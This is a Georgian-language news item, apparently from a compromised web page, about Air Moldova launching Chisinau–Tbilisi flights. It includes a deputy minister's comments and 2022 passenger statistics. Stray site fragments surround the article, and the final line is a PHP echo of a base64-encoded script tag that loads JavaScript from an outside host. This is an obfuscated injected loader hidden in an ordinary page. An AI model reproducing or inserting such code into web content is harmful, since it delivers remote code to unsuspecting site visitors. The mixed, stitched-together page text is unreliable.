celsiusi
ავერსი შნაიდერი
მოლდოვის დედაქალაქი კიშინეუ კიდევ ერთი ევროპული საჰაერო მიმართულებაა, რომლითაც საქართველო ევროპას დაუკავშირდა. ჩვენი პრიორიტეტია, გავზარდოთ პირდაპირი რეისებისა და მიმართულებების რაოდენობა ევროკავშირის ქვეყნებთან, რისთვისაც აქტიურად ვმუშაობთ ევროპის ავიაგადამყვანებთან, – განაცხადა ეკონომიკისა და მდგრადი განვითარების მინისტრის მოადგილე მარიამ ქვრივიშვილმა.
 
„იმედი გვაქვს, რომ ევროპიდან და სხვა პრიორიტეტული მიმართულებებიდან რეისების ზრდის პარალელურად, ტურისტების რაოდენობა მოიმატებს, რაც ხელს შეუწყობს ორივე დარგის, ტურიზმისა და სამოქალაქო ავიაციის აღდგენა-განვითარების პროცესს,“ – აღნიშნა მარიამ ქვრივიშვილმა.
 
ავიაკომპანია Air Moldova-მ კიშინეუ-თბილისი-კიშინეუს საჰაერო ხაზზე რეგულარული საჰაერო მიმოსვლა დაიწყო. პირველი რეისი საქართველოსა და მოლდოვის რესპუბლიკის დედაქალაქებს შორის დღეს განხორციელდა. კიშინეუსა და თბილისს შორის რეგულარული ფრენები მიმდინარე წლის 16 ოქტომბრიდან 27 ოქტომბრის ჩათვლით, კვირაში ორი სიხშირით, ყოველ ორშაბათს და პარასკევს შესრულდება, ხოლო 2022 წლის 30 ოქტომბრიდან  2023 წლის 23 მარტის ჩათვლით – კვირაში ოთხი სიხშირით ყოველ ორშაბათს, სამშაბათს, ხუთშაბათს და პარასკევს.
 
„აღსანიშნავია, რომ 2022 წლის 9 თვის მონაცემებით, საქართველოს აეროპორტები, ჯამში, 3 299 808 მგზავრს მოემსახურა, რაც 92%-ით მეტია 2021 წლის ანალოგიურ პერიოდში გადაყვანილი მგზავრების რაოდენობაზე. პანდემიამდე, 2019 წლის პირველ ცხრა თვეში გადაყვანილ მგზავრთა რაოდენობასთან მიმართებაში, მგზავრთნაკადის აღდგენის მაჩვენებელი 80%-ს შეადგენს“,- აღნიშნულია ეკონომიკის სამინისტროს ინფორმაციაში.
429
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");